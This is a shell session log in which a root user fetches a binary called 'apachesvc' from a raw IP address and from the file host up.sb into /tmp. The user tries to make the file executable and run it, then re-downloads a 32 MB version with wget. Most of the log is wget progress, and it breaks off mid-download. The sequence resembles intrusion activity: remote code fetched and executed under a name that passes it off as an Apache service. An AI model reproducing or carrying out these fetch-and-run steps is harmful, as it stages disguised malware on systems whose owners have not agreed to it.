[2026-04-22 12:03:11]
COMMAND: unrar -h
EXIT CODE: 127
STDOUT:
(no output)
STDERR:
/bin/sh: unrar: command not found
----------------------------------------
[2026-04-22 12:07:20]
COMMAND: /usr/bin/sh whoami
EXIT CODE: 126
STDOUT:
(no output)
STDERR:
/usr/bin/whoami: /usr/bin/whoami: cannot execute binary file
----------------------------------------
[2026-04-22 12:08:24]
COMMAND: whoami
EXIT CODE: 0
STDOUT:
root
----------------------------------------
[2026-04-22 12:16:40]
COMMAND: curl http://103.202.153.183:8443/apachesvc -o /tmp/apachesvc
EXIT CODE: 7
STDOUT:
(no output)
STDERR:
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (7) Failed to connect to 103.202.153.183 port 8443: Connection refused
----------------------------------------
[2026-04-22 12:20:56]
COMMAND: curl http://up.sb/pZUrK/apachesvc -o /tmp/apachesvc
EXIT CODE: 0
STDOUT:
(no output)
STDERR:
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:02 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:03 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:04 --:--:--     0
  0     0    0     0    0     0      0      0 --:--:--  0:00:05 --:--:--     0
100   166  100   166    0     0     27      0  0:00:06  0:00:06 --:--:--    36
----------------------------------------
[2026-04-22 12:22:00]
COMMAND: file /tmp/apachesvc && chmod +X /tmp/apachesvc && /tmp/apachesvc
EXIT CODE: 126
STDOUT:
/tmp/apachesvc: HTML document, ASCII text, with CRLF line terminators
STDERR:
/bin/sh: /tmp/apachesvc: Permission denied
----------------------------------------
[2026-04-22 12:24:24]
COMMAND: wget http://up.sb/pZUrK/apachesvc -O /tmp/xd
EXIT CODE: 0
STDOUT:
(no output)
STDERR:
--2026-04-22 12:24:07--  http://up.sb/pZUrK/apachesvc
Resolving up.sb (up.sb)... 206.190.234.172
Connecting to up.sb (up.sb)|206.190.234.172|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://up.sb/pZUrK/apachesvc [following]
--2026-04-22 12:24:12--  https://up.sb/pZUrK/apachesvc
Connecting to up.sb (up.sb)|206.190.234.172|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33149076 (32M)
Saving to: ‘/tmp/xd’

     0K .......... .......... .......... .......... ..........  0%  100K 5m22s
    50K .......... .......... .......... .......... ..........  0%  162K 4m20s
   100K .......... .......... .......... .......... ..........  0%  305K 3m29s
   150K .......... .......... .......... .......... ..........  0%  500K 2m52s
   200K .......... .......... .......... .......... ..........  0%  463K 2m32s
   250K .......... .......... .......... .......... ..........  0%  704K 2m14s
   300K .......... .......... .......... .......... ..........  1%  829K 2m0s
   350K .......... .......... .......... .......... ..........  1%  955K 1m49s
   400K .......... .......... .......... .......... ..........  1% 1.04M 1m40s
   450K .......... .......... .......... .......... ..........  1% 1.20M 92s
   500K .......... .......... .......... .......... ..........  1% 1.17M 86s
   550K .......... .......... .......... .......... ..........  1% 1.39M 81s
   600K .......... .......... .......... .......... ..........  2% 1.42M 76s
   650K .......... .......... .......... .......... ..........  2% 1.63M 72s
   700K .......... .......... .......... .......... ..........  2% 1.60M 68s
   750K .......... .......... .......... .......... ..........  2% 1.92M 65s
   800K .......... .......... .......... .......... ..........  2% 1.96M 62s
   850K .......... .......... .......... .......... ..........  2% 2.23M 59s
   900K .......... .......... .......... .......... ..........  2% 2.12M 57s
   950K .......... .......... .......... .......... ..........  3% 2.50M 55s
  1000K .......... .......... .......... .......... ..........  3% 2.49M 52s
  1050K .......... .......... .......... .......... ..........  3% 2.37M 51s
  1100K .......... .......... .......... .......... ..........  3% 3.11M 49s
  1150K .......... .......... .......... .......... ..........  3% 3.01M 47s
  1200K .......... .......... .......... .......... ..........  3% 2.96M 45s
  1250K .......... .......... .......... .......... ..........  4% 3.23M 44s
  1300K .......... .......... .......... .......... ..........  4% 2.71M 43s
  1350K .......... .......... .......... .......... ..........  4% 3.40M 41s
  1400K .......... .......... .......... .......... ..........  4% 3.26M 40s
  1450K .......... .......... .......... .......... ..........  4% 3.10M 39s
  1500K .......... .......... .......... .......... ..........  4% 3.86M 38s
  1550K .......... .......... .......... .......... ..........  4% 3.74M 37s
  1600K .......... .......... .......... .......... ..........  5% 3.80M 36s
  1650K .......... .......... .......... .......... ..........  5% 3.92M 35s
  1700K .......... .......... .......... .......... ..........  5% 4.05M 34s
  1750K .......... .......... .......... .......... ..........  5% 4.17M 34s
  1800K .......... .......... .......... .......... ..........  5% 4.39M 33s
  1850K .......... .......... .......... .......... ..........  5% 4.52M 32s
  1900K .......... .......... .......... .......... ..........  6% 4.56M 31s
  1950K .......... .......... .......... .......... ..........  6% 4.63M 31s
  2000K .......... .......... .......... .......... ..........  6% 4.95M 30s
  2050K .......... .......... .......... .......... ..........  6% 4.89M 29s
  2100K .......... .......... .......... .......... ..........  6% 5.09M 29s
  2150K .......... .......... .......... .......... ..........  6% 5.23M 28s
  2200K .......... .......... .......... .......... ..........  6% 5.29M 28s
  2250K .......... .......... .......... .......... ..........  7% 5.90M 27s
  2300K .......... .......... .......... .......... ..........  7% 5.56M 27s
  2350K .......... .......... .......... .......... ..........  7% 5.71M 26s
  2400K .......... .......... .......... .......... ..........  7% 5.88M 26s
  2450K .......... .......... .......... .......... ..........  7% 5.97M 25s
  2500K .......... .......... .......... .......... ..........  7% 6.10M 25s
  2550K .......... .......... .......... .......... ..........  8% 6.20M 24s
  2600K .......... .......... .......... .......... ..........  8% 6.33M 24s
  2650K .......... .......... .......... .......... ..........  8% 6.69M 24s
  2700K .......... .......... .......... .......... ..........  8% 5.40M 23s
  2750K .......... .......... .......... .......... ..........  8% 7.09M 23s
  2800K .......... .......... .......... .......... ..........  8% 6.71M 22s
  2850K .......... .......... .......... .......... ..........  8% 6.19M 22s
  2900K .......... .......... .......... .......... ..........  9% 6.85M 22s
  2950K .......... .......... .......... .......... ..........  9% 6.43M 21s
  3000K .......... .......... .......... .......... ..........  9% 6.14M 21s
  3050K .......... .......... .......... .......... ..........  9% 8.13M 21s
  3100K .......... .......... .......... .......... ..........  9% 7.62M 20s
  3150K .......... .......... .......... .......... ..........  9% 7.10M 20s
  3200K .......... .......... .......... .......... .......... 10% 7.83M 20s
  3250K .......... .......... .......... .......... .......... 10% 7.92M 20s
  3300K .......... .......... .......... .......... .......... 10% 6.89M 19s
  3350K .......... .......... .......... .......... .......... 10% 8.21M 19s
  3400K .......... .......... .......... .......... .......... 10% 8.30M 19s
  3450K .......... .......... .......... .......... .......... 10% 7.86M 19s
  3500K .......... .......... .......... .......... .......... 10% 8.48M 18s
  3550K .......... .......... .......... .......... .......... 11% 7.74M 18s
  3600K .......... .......... .......... .......... .......... 11% 9.34M 18s
  3650K .......... .......... .......... .......... .......... 11% 8.35M 18s
  3700K .......... .......... .......... .......... .......... 11% 9.94M 17s
  3750K .......... .......... .......... .......... .......... 11% 8.47M 17s
  3800K .......... .......... .......... .......... .......... 11% 8.65M 17s
  3850K .......... .......... .......... .......... .......... 12% 9.74M 17s
  3900K .......... .......... .......... .......... .......... 12% 9.57M 17s
  3950K .......... .......... .......... .......... .......... 12% 9.40M 16s
  4000K .......... .......... .......... .......... .......... 12% 8.84M 16s
  4050K .......... .......... .......... .......... .......... 12% 9.37M 16s
  4100K .......... .......... .......... .......... .......... 12% 12.0M 16s
  4150K .......... .......... .......... .......... .......... 12% 9.83M 16s
  4200K .......... .......... .......... .......... .......... 13% 8.79M 15s
  4250K .......... .......... .......... .......... .......... 13% 9.78M 15s
  4300K .......... .......... .......... .......... .......... 13% 12.4M 15s
  4350K .......... .......... .......... .......... .......... 13% 10.6M 15s
  4400K .......... .......... .......... .......... .......... 13% 9.36M 15s
  4450K .......... .......... .......... .......... .......... 13% 10.5M 15s
  4500K .......... .......... .......... .......... .......... 14% 11.9M 14s
  4550K .......... .......... .......... .......... .......... 14% 11.5M 14s
  4600K .......... .......... .......... .......... .......... 14% 11.0M 14s
  4650K .......... .......... .......... .......... .......... 14% 11.1M 14s
  4700K .......... .......... .......... .......... .......... 14% 13.2M 14s
  4750K .......... .......... .......... .......... .......... 14% 12.5M 14s
  4800K .......... .......... .......... .......... .......... 14% 10.1M 14s
  4850K .......... .......... .......... .......... .......... 15% 10.6M 13s
  4900K .......... .......... .......... .......... .......... 15% 13.4M 13s
  4950K .......... .......... .......... .......... .......... 15% 11.5M 13s
  5000K .......... .......... .......... .......... .......... 15% 12.8M 13s
  5050K .......... .......... .......... .......... .......... 15% 13.6M 13s
  5100K .......... .......... .......... .......... .......... 15% 11.3M 13s
  5150K .......... .......... .......... .......... .......... 16% 13.7M 13s
  5200K .......... .......... .......... .......... .......... 16% 12.8M 12s
  5250K .......... .......... .......... .......... .......... 16% 12.8M 12s
  5300K .......... .......... .......... .......... .......... 16% 12.8M 12s
  5350K .......... .......... .......... .......... .......... 16% 10.1M 12s
  5400K .......... .......... .......... .......... .......... 16% 12.3M 12s
  5450K .......... .......... .......... .......... .......... 16% 13.3M 12s
  5500K .......... .......... .......... .......... .......... 17% 13.3M 12s
  5550K .......... .......... .......... .......... .......... 17% 10.5M 12s
  5600K .......... .......... .......... .......... .......... 17% 14.3M 12s
  5650K .......... .......... .......... .......... .......... 17% 14.9M 11s
  5700K .......... .......... .......... .......... .......... 17% 12.0M 11s
  5750K .......... .......... .......... .......... .......... 17% 14.3M 11s
  5800K .......... .......... .......... .......... .......... 18% 10.0M 11s
  5850K .......... .......... .......... .......... .......... 18% 16.7M 11s
  5900K .......... .......... .......... .......... .......... 18% 13.1M 11s
  5950K .......... .......... .......... .......... .......... 18% 16.5M 11s
  6000K .......... .......... .......... .......... .......... 18% 11.1M 11s
  6050K .......... .......... .......... .......... .......... 18% 2.04M 11s
  6100K .......... .......... .......... .......... .......... 18% 15.7M 11s
  6150K .......... .......... .......... .......... .......... 19% 16.9M 11s
  6200K .......... .......... .......... .......... .......... 19% 17.8M 11s
  6250K .......... .......... .......... .......... .......... 19% 15.9M 10s
  6300K .......... .......... .......... .......... .......... 19% 1.74M 10s
  6350K .......... .......... .......... .......... .......... 19% 26.3M 10s
  6400K .......... .......... .......... .......... .......... 19% 1.67M 10s
  6450K .......... .......... .......... .......... .......... 20% 16.1M 10s
  6500K .......... .......... .......... .......... .......... 20% 17.2M 10s
  6550K .......... .......... .......... .......... .......... 20% 18.0M 10s
  6600K .......... .......... .......... .......... .......... 20% 26.2M 10s
  6650K .......... .......... .......... .......... .......... 20% 1.31M 10s
  6700K .......... .......... .......... .......... .......... 20% 1.38M 10s
  6750K .......... .......... .......... .......... .......... 21% 35.8M 10s
  6800K .......... .......... .......... .......... .......... 21% 17.3M 10s
  6850K .......... .......... .......... .......... .......... 21% 26.1M 10s
  6900K .......... .......... .......... .......... .......... 21% 16.2M 10s
  6950K .......... .......... .......... .......... .......... 21% 1.13M 10s
  7000K .......... .......... .......... .......... .......... 21% 32.9M 10s
  7050K .......... .......... .......... .......... .......... 21% 1.47M 10s
  7100K .......... .......... .......... .......... .......... 22% 28.4M 10s
  7150K .......... .......... .......... .......... .......... 22% 24.1M 10s
  7200K .......... .......... .......... .......... .......... 22% 16.8M 10s
  7250K .......... .......... .......... .......... .......... 22% 12.5M 9s
  7300K .......... .......... .......... .......... .......... 22% 1.13M 10s
  7350K .......... .......... .......... .......... .......... 22% 1.45M 10s
  7400K .......... .......... .......... .......... .......... 23% 36.8M 9s
  7450K .......... .......... .......... .......... .......... 23% 26.0M 9s
  7500K .......... .......... .......... .......... .......... 23% 23.8M 9s
  7550K .......... .......... .......... .......... .......... 23% 13.0M 9s
  7600K .......... .......... .......... .......... .......... 23% 1.09M 9s
  7650K .......... .......... .......... .......... .......... 23% 38.5M 9s
  7700K .......... .......... .......... .......... .......... 23% 1.56M 9s
  7750K .......... .......... .......... .......... .......... 24% 31.4M 9s
  7800K .......... .......... .......... .......... .......... 24% 27.5M 9s
  7850K .......... .......... .......... .......... .......... 24% 13.7M 9s
  7900K .......... .......... .......... .......... .......... 24% 12.6M 9s
  7950K .......... .......... .......... .......... .......... 24% 1.38M 9s
  8000K .......... .......... .......... .......... .......... 24% 1.80M 9s
  8050K .......... .......... .......... .......... .......... 25% 40.8M 9s
  8100K .......... .......... .......... .......... .......... 25% 26.9M 9s
  8150K .......... .......... .......... .......... .......... 25% 19.1M 9s
  8200K .......... .......... .......... .......... .......... 25% 12.5M 9s
  8250K .......... .......... .......... .......... .......... 25% 1.48M 9s
  8300K .......... .......... .......... .......... .......... 25% 37.0M 9s
  8350K .......... .......... .......... .......... .......... 25% 1.95M 9s
  8400K .......... .......... .......... .......... .......... 26% 24.7M 9s
  8450K .......... .......... .......... .......... .......... 26% 27.3M 9s
  8500K .......... .......... .......... .......... .......... 26% 16.7M 9s
  8550K .......... .......... .......... .......... .......... 26% 12.8M 8s
  8600K .......... .......... .......... .......... .......... 26% 1.55M 9s
  8650K .......... .......... .......... .......... .......... 26% 1.79M 9s
  8700K .......... .......... .......... .......... .......... 27% 37.2M 8s
  8750K .......... .......... .......... .......... .......... 27% 24.1M 8s
  8800K .......... .......... .......... .......... .......... 27% 22.1M 8s
  8850K .......... .......... .......... .......... .......... 27% 13.1M 8s
  8900K .......... .......... .......... .......... .......... 27% 1.39M 8s
  8950K .......... .......... .......... .......... .......... 27% 59.9M 8s
  9000K .......... .......... .......... .......... .......... 27% 1.54M 8s
  9050K .......... .......... .......... .......... .......... 28% 39.2M 8s
  9100K .......... .......... .......... .......... .......... 28% 27.5M 8s
  9150K .......... .......... .......... .......... .......... 28% 12.8M 8s
  9200K .......... .......... .......... .......... .......... 28% 10.4M 8s
  9250K .......... .......... .......... .......... .......... 28% 1.11M 8s
  9300K .......... .......... .......... .......... .......... 28% 1.37M 8s
  9350K .......... .......... .......... .......... .......... 29% 38.7M 8s
  9400K .......... .......... .......... .......... .......... 29% 35.7M 8s
  9450K .......... .......... .......... .......... .......... 29% 20.3M 8s
  9500K .......... .......... .......... .......... .......... 29% 12.4M 8s
  9550K .......... .......... .......... .......... .......... 29% 1.09M 8s
  9600K .......... .......... .......... .......... .......... 29% 36.2M 8s
  9650K .......... .......... .......... .......... .......... 29% 1.57M 8s
  9700K .......... .......... .......... .......... .......... 30% 29.5M 8s
  9750K .......... .......... .......... .......... .......... 30% 28.0M 8s
  9800K .......... .......... .......... .......... .......... 30% 15.5M 8s
  9850K .......... .......... .......... .......... .......... 30% 11.9M 8s
  9900K .......... .......... .......... .......... .......... 30% 1.31M 8s
  9950K .......... .......... .......... .......... .......... 30% 1.89M 8s
 10000K .......... .......... .......... .......... .......... 31% 40.1M 8s
 10050K .......... .......... .......... .......... .......... 31% 29.7M 8s
 10100K .......... .......... .......... .......... .......... 31% 27.7M 8s
 10150K .......... .......... .......... .......... .......... 31% 12.5M 8s
 10200K .......... .......... .......... .......... .......... 31% 1.48M 8s
 10250K .......... .......... .......... .......... .......... 31% 15.2M 8s
 10300K .......... .......... .......... .......... .......... 31% 2.29M 7s
 10350K .......... .......... .......... .......... .......... 32% 28.9M 7s
 10400K .......... .......... .......... .......... .......... 32% 30.7M 7s
 10450K .......... .......... .......... .......... .......... 32% 18.2M 7s
 10500K .......... .......... .......... .......... .......... 32% 12.7M 7s
 10550K .......... .......... .......... .......... .......... 32% 1.43M 7s
 10600K .......... .......... .......... .......... .......... 32% 45.1M 7s
 10650K .......... .......... .......... .......... .......... 33% 2.30M 7s
 10700K .......... .......... .......... .......... .......... 33% 26.9M 7s
 10750K .......... .......... .......... .......... .......... 33% 26.6M 7s
 10800K .......... .......... .......... .......... .......... 33% 13.5M 7s
 10850K .......... .......... .......... .......... .......... 33% 12.8M 7s
 10900K .......... .......... .......... .......... .......... 33% 1.56M 7s
 10950K .......... .......... .......... .......... .......... 33% 2.56M 7s
 11000K .......... .......... .......... .......... .......... 34% 31.1M 7s
 11050K .......... .......... .......... .......... .......... 34% 34.4M 7s
 11100K .......... .......... .......... .......... .......... 34% 19.4M 7s
 11150K .......... .......... .......... .......... .......... 34% 12.6M 7s
 11200K .......... .......... .......... .......... .......... 34% 1.51M 7s
 11250K .......... .......... .......... .......... .......... 34% 33.4M 7s
 11300K .......... .......... .......... .......... .......... 35% 2.49M 7s
 11350K .......... .......... .......... .......... .......... 35% 29.2M 7s
 11400K .......... .......... .......... .......... .......... 35% 28.8M 7s
 11450K .......... .......... .......... .......... .......... 35% 17.2M 7s
 11500K .......... .......... .......... .......... .......... 35% 11.6M 7s
 11550K .......... .......... .......... .......... .......... 35% 1.39M 7s
 11600K .......... .......... .......... .......... .......... 35% 41.6M 7s
 11650K .......... .......... .......... .......... .......... 36% 1.90M 7s
 11700K .......... .......... .......... .......... .......... 36% 30.2M 7s
 11750K .......... .......... .......... .......... .......... 36% 29.8M 7s
 11800K .......... .......... .......... .......... .......... 36% 12.7M 7s
 11850K .......... .......... .......... .......... .......... 36% 8.62M 7s
 11900K .......... .......... .......... .......... .......... 36% 1.09M 7s
 11950K .......... .......... .......... .......... .......... 37% 1.56M 7s
 12000K .......... .......... .......... .......... .......... 37% 44.6M 7s
 12050K .......... .......... .......... .......... .......... 37% 28.3M 6s
 12100K .......... .......... .......... .......... .......... 37% 19.7M 6s
 12150K .......... .......... .......... .......... .......... 37% 7.91M 6s
 12200K .......... .......... .......... .......... .......... 37%  963K 6s
 12250K .......... .......... .......... .......... .......... 37% 38.7M 6s
 12300K .......... .......... .......... .......... .......... 38% 1.89M 6s
 12350K .......... .......... .......... .......... .......... 38% 28.8M 6s
 12400K .......... .......... .......... .......... .......... 38% 42.3M 6s
 12450K .......... .......... .......... .......... .......... 38% 14.9M 6s
 12500K .......... .......... .......... .......... .......... 38% 11.9M 6s
 12550K .......... .......... .......... .......... .......... 38%  997K 6s
 12600K .......... .......... .......... .......... .......... 39% 53.9M 6s
 12650K .......... .......... .......... .......... .......... 39% 1.82M 6s
 12700K .......... .......... .......... .......... .......... 39% 24.5M 6s
 12750K .......... .......... .......... .......... .......... 39% 30.2M 6s
 12800K .......... .......... .......... .......... .......... 39% 14.4M 6s
 12850K .......... .......... .......... .......... .......... 39% 12.7M 6s
 12900K .......... .......... .......... .......... .......... 40% 1.12M 6s
 12950K .......... .......... .......... .......... .......... 40% 2.11M 6s
 13000K .......... .......... .......... .......... .......... 40% 25.7M 6s
 13050K .......... .......... .......... .......... .......... 40% 28.1M 6s
 13100K .......... .......... .......... .......... .......... 40% 30.9M 6s
 13150K .......... .......... .......... .......... .......... 40% 13.6M 6s
 13200K .......... .......... .......... .......... .......... 40% 1.24M 6s
 13250K .......... .......... .......... .......... .......... 41% 34.6M 6s
 13300K .......... .......... .......... .......... .......... 41% 2.59M 6s
 13350K .......... .......... .......... .......... .......... 41% 44.0M 6s
 13400K .......... .......... .......... .......... .......... 41% 24.4M 6s
 13450K .......... .......... .......... .......... .......... 41% 21.2M 6s
 13500K .......... .......... .......... .......... .......... 41% 12.5M 6s
 13550K .......... .......... .......... .......... .......... 42% 1.27M 6s
 13600K .......... .......... .......... .......... .......... 42% 35.4M 6s
 13650K .......... .......... .......... .......... .......... 42% 2.60M 6s
 13700K .......... .......... .......... .......... .......... 42% 29.4M 6s
 13750K .......... .......... .......... .......... .......... 42% 26.8M 6s
 13800K .......... .......... .......... .......... .......... 42% 14.3M 6s
 13850K .......... .......... .......... .......... .......... 42% 13.3M 6s
 13900K .......... .......... .......... .......... .......... 43% 1.24M 6s
 13950K .......... .......... .......... .......... .......... 43% 41.6M 6s
 14000K .......... .......... .......... .......... .......... 43% 2.82M 6s
 14050K .......... .......... .......... .......... .......... 43% 26.4M 6s
 14100K .......... .......... .......... .......... .......... 43% 29.1M 6s
 14150K .......... .......... .......... .......... .......... 43% 13.4M 6s
 14200K .......... .......... .......... .......... .......... 44% 12.9M 6s
 14250K .......... .......... .......... .......... .......... 44% 1.08M 6s
 14300K .......... .......... .......... .......... .......... 44% 2.33M 6s
 14350K .......... .......... .......... .......... .......... 44% 44.8M 6s
 14400K .......... .......... .......... .......... .......... 44% 26.4M 5s
 14450K .......... .......... .......... .......... .......... 44% 22.8M 5s
 14500K .......... .......... .......... .......... .......... 44% 11.2M 5s
 14550K .......... .......... .......... .......... .......... 45%  922K 5s
 14600K .......... .......... .......... .......... .......... 45% 51.9M 5s
 14650K .......... .......... .......... .......... .......... 45% 1.90M 5s
 14700K .......... .......... .......... .......... .......... 45% 44.3M 5s
 14750K .......... .......... .......... .......... .......... 45% 26.9M 5s
 14800K .......... .......... .......... .......... .......... 45% 20.2M 5s
 14850K .......... .......... .......... .......... .......... 46% 8.00M 5s
 14900K .......... .......... .......... .......... .......... 46%  856K 5s
 14950K .......... .......... .......... .......... .......... 46% 27.7M 5s
 15000K .......... .......... .......... .......... .......... 46% 1.86M 5s
 15050K .......... .......... .......... .......... .......... 46% 40.0M 5s
 15100K .......... .......... .......... .......... .......... 46% 26.2M 5s
 15150K .......... .......... .......... .......... .......... 46% 16.8M 5s
 15200K .......... .......... .......... .......... .......... 47% 12.0M 5s
 15250K .......... .......... .......... .......... .......... 47%  930K 5s
 15300K .......... .......... .......... .......... .......... 47% 28.1M 5s
 15350K .......... .......... .......... .......... .......... 47% 1.96M 5s
 15400K .......... .......... .......... .......... .......... 47% 27.2M 5s
 15450K .......... .......... .......... .......... .......... 47% 42.0M 5s
 15500K .......... .......... .......... .......... .......... 48% 13.6M 5s
 15550K .......... .......... .......... .......... .......... 48% 12.9M 5s
 15600K .......... .......... .......... .......... .......... 48%  932K 5s
 15650K .......... .......... .......... .......... .......... 48% 26.2M 5s
 15700K .......... .......... .......... .......... .......... 48% 2.01M 5s
 15750K .......... .......... .......... .......... .......... 48% 26.4M 5s
 15800K .......... .......... .......... .......... .......... 48% 31.5M 5s
 15850K .......... .......... .......... .......... .......... 49% 12.0M 5s
 15900K .......... .......... .......... .......... .......... 49% 12.9M 5s
 15950K .......... .......... .......... .......... .......... 49%  862K 5s
 16000K .......... .......... .......... .......... .......... 49% 1.89M 5s
 16050K .......... .......... .......... .......... .......... 49% 33.5M 5s
 16100K .......... .......... .......... .......... .......... 49% 42.9M 5s
 16150K .......... .......... .......... .......... .......... 50% 21.2M 5s
 16200K .......... .......... .......... .......... .......... 50% 13.1M 5s
 16250K .......... .......... .......... .......... .......... 50%  893K 5s
 16300K .......... .......... .......... .......... .......... 50% 8.06M 5s
 16350K .......... .......... .......... .......... .......... 50% 1.74M 5s
 16400K .......... .......... .......... .......... .......... 50% 33.9M 5s
 16450K .......... .......... .......... .......... .......... 50% 26.5M 5s
 16500K .......... .......... .......... .......... .......... 51% 32.1M 5s
 16550K .......... .......... .......... .......... .......... 51% 13.3M 5s
 16600K .......... .......... .......... .......... .......... 51%  857K 5s
 16650K .......... .......... .......... .......... .......... 51% 51.1M 5s
 16700K .......... .......... .......... .......... .......... 51% 1.77M 5s
 16750K .......... .......... .......... .......... .......... 51% 30.8M 5s
 16800K .......... .......... .......... .......... .......... 52% 29.6M 5s
 16850K .......... .......... .......... .......... .......... 52% 19.6M 5s
 16900K .......... .......... .......... .......... .......... 52% 12.5M 5s
 16950K .......... .......... .......... .......... .......... 52%  752K 5s
 17000K .......... .......... .......... .......... .......... 52% 40.9M 5s
 17050K .......... .......... .......... .......... .......... 52% 1.65M 5s
 17100K .......... .......... .......... .......... .......... 52% 33.7M 5s
 17150K .......... .......... .......... .......... .......... 53% 41.5M 5s
 17200K .......... .......... .......... .......... .......... 53% 17.1M 5s
 17250K .......... .......... .......... .......... .......... 53% 13.2M 5s
 17300K .......... .......... .......... .......... .......... 53%  780K 5s
 17350K .......... .......... .......... .......... .......... 53% 26.8M 5s
 17400K .......... .......... .......... .......... .......... 53% 1.87M 5s
 17450K .......... .......... .......... .......... .......... 54% 32.8M 4s
 17500K .......... .......... .......... .......... .......... 54% 26.4M 4s
 17550K .......... .......... .......... .......... .......... 54% 16.3M 4s
 17600K .......... .......... .......... .......... .......... 54% 12.5M 4s
 17650K .......... .......... .......... .......... .......... 54%  897K 4s
 17700K .......... .......... .......... .......... .......... 54% 28.7M 4s
 17750K .......... .......... .......... .......... .......... 54% 2.17M 4s
 17800K .......... .......... .......... .......... .......... 55% 25.8M 4s
 17850K .......... .......... .......... .......... .......... 55% 42.0M 4s
 17900K .......... .......... .......... .......... .......... 55% 14.1M 4s
 17950K .......... .......... .......... .......... .......... 55% 12.6M 4s
 18000K .......... .......... .......... .......... .......... 55% 1010K 4s
 18050K .......... .......... .......... .......... .......... 55% 26.6M 4s
 18100K .......... .......... .......... .......... .......... 56% 2.35M 4s
 18150K .......... .......... .......... .......... .......... 56% 41.6M 4s
 18200K .......... .......... .......... .......... .......... 56% 28.7M 4s
 18250K .......... .......... .......... .......... .......... 56% 14.6M 4s
 18300K .......... .......... .......... .......... .......... 56% 12.4M 4s
 18350K .......... .......... .......... .......... .......... 56%  974K 4s
 18400K .......... .......... .......... .......... .......... 56% 43.6M 4s
 18450K .......... .......... .......... .......... .......... 57% 2.14M 4s
 18500K .......... .......... .......... .......... .......... 57% 25.8M 4s
 18550K .......... .......... .......... .......... .......... 57% 25.8M 4s
 18600K .......... .......... .......... .......... .......... 57% 14.8M 4s
 18650K .......... .......... .......... .......... .......... 57% 11.7M 4s
 18700K .......... .......... .......... .......... .......... 57% 1.00M 4s
 18750K .......... .......... .......... .......... .......... 58% 28.4M 4s
 18800K .......... .......... .......... .......... .......... 58% 2.36M 4s
 18850K .......... .......... .......... .......... .......... 58% 27.7M 4s
 18900K .......... .......... .......... .......... .......... 58% 45.7M 4s
 18950K .......... .......... .......... .......... .......... 58% 13.2M 4s
 19000K .......... .......... .......... .......... .......... 58% 12.7M 4s
 19050K .......... .......... .......... .......... .......... 59%  974K 4s
 19100K .......... .......... .......... .......... .......... 59% 43.5M 4s
 19150K .......... .......... .......... .......... .......... 59% 2.15M 4s
 19200K .......... .......... .......... .......... .......... 59% 27.2M 4s
 19250K .......... .......... .......... .......... .......... 59% 25.8M 4s
 19300K .......... .......... .......... .......... .......... 59% 15.3M 4s
 19350K .......... .......... .......... .......... .......... 59% 12.7M 4s
 19400K .......... .......... .......... .......... .......... 60% 1009K 4s
 19450K .......... .......... .......... .......... .......... 60% 40.4M 4s
 19500K .......... .......... .......... .......... .......... 60% 2.17M 4s
 19550K .......... .......... .......... .......... .......... 60% 25.9M 4s
 19600K .......... .......... .......... .......... .......... 60% 26.1M 4s
 19650K .......... .......... .......... .......... .......... 60% 14.0M 4s
 19700K .......... .......... .......... .......... .......... 61% 12.6M 4s
 19750K .......... .......... .......... .......... .......... 61%  877K 4s
 19800K .......... .......... .......... .......... .......... 61% 26.8M 4s
 19850K .......... .......... .......... .......... .......... 61% 2.17M 4s
 19900K .......... .......... .......... .......... .......... 61% 29.4M 4s
 19950K .......... .......... .......... .......... .......... 61% 29.8M 4s
 20000K .......... .......... .......... .......... .......... 61% 14.1M 4s
 20050K .......... .......... .......... .......... .......... 62% 12.5M 4s
 20100K .......... .......... .......... .......... .......... 62%  947K 4s
 20150K .......... .......... .......... .......... .......... 62% 24.7M 4s
 20200K .......... .......... .......... .......... .......... 62% 2.42M 4s
 20250K .......... .......... .......... .......... .......... 62% 25.6M 4s
 20300K .......... .......... .......... .......... .......... 62% 28.4M 4s
 20350K .......... .......... .......... .......... .......... 63% 13.9M 4s
 20400K .......... .......... .......... .......... .......... 63% 12.2M 3s
 20450K .......... .......... .......... .......... .......... 63%  929K 3s
 20500K .......... .......... .......... .......... .......... 63% 48.3M 3s
 20550K .......... .......... .......... .......... .......... 63% 1.97M 3s
 20600K .......... .......... .......... .......... .......... 63% 27.8M 3s
 20650K .......... .......... .......... .......... .......... 63% 27.5M 3s
 20700K .......... .......... .......... .......... .......... 64% 16.9M 3s
 20750K .......... .......... .......... .......... .......... 64% 12.8M 3s
 20800K .......... .......... .......... .......... .......... 64%  769K 3s
 20850K .......... .......... .......... .......... .......... 64% 25.5M 3s
 20900K .......... .......... .......... .......... .......... 64% 1.73M 3s
 20950K .......... .......... .......... .......... .......... 64% 28.9M 3s
 21000K .......... .......... .......... .......... .......... 65% 29.1M 3s
 21050K .......... .......... .......... .......... .......... 65% 14.5M 3s
 21100K .......... .......... .......... .......... .......... 65% 12.9M 3s
 21150K .......... .......... .......... .......... .......... 65%  761K 3s
 21200K .......... .......... .......... .......... .......... 65% 25.3M 3s
 21250K .......... .......... .......... .......... .......... 65% 1.76M 3s
 21300K .......... .......... .......... .......... .......... 65% 42.3M 3s
 21350K .......... .......... .......... .......... .......... 66% 27.0M 3s
 21400K .......... .......... .......... .......... .......... 66% 13.7M 3s
 21450K .......... .......... .......... .......... .......... 66% 12.4M 3s
 21500K .......... .......... .......... .......... .......... 66%  795K 3s
 21550K .......... .......... .......... .......... .......... 66% 33.2M 3s
 21600K .......... .......... .......... .......... .......... 66% 1.80M 3s
 21650K .......... .......... .......... .......... .......... 67% 35.6M 3s
 21700K .......... .......... .......... .......... .......... 67% 28.8M 3s
 21750K .......... .......... .......... .......... .......... 67% 16.4M 3s
 21800K .......... .......... .......... .......... .......... 67% 12.9M 3s
 21850K .......... .......... .......... .......... .......... 67%  899K 3s
 21900K .......... .......... .......... .......... .......... 67% 31.5M 3s
 21950K .......... .......... .......... .......... .......... 67% 2.34M 3s
 22000K .......... .......... .......... .......... .......... 68% 36.2M 3s
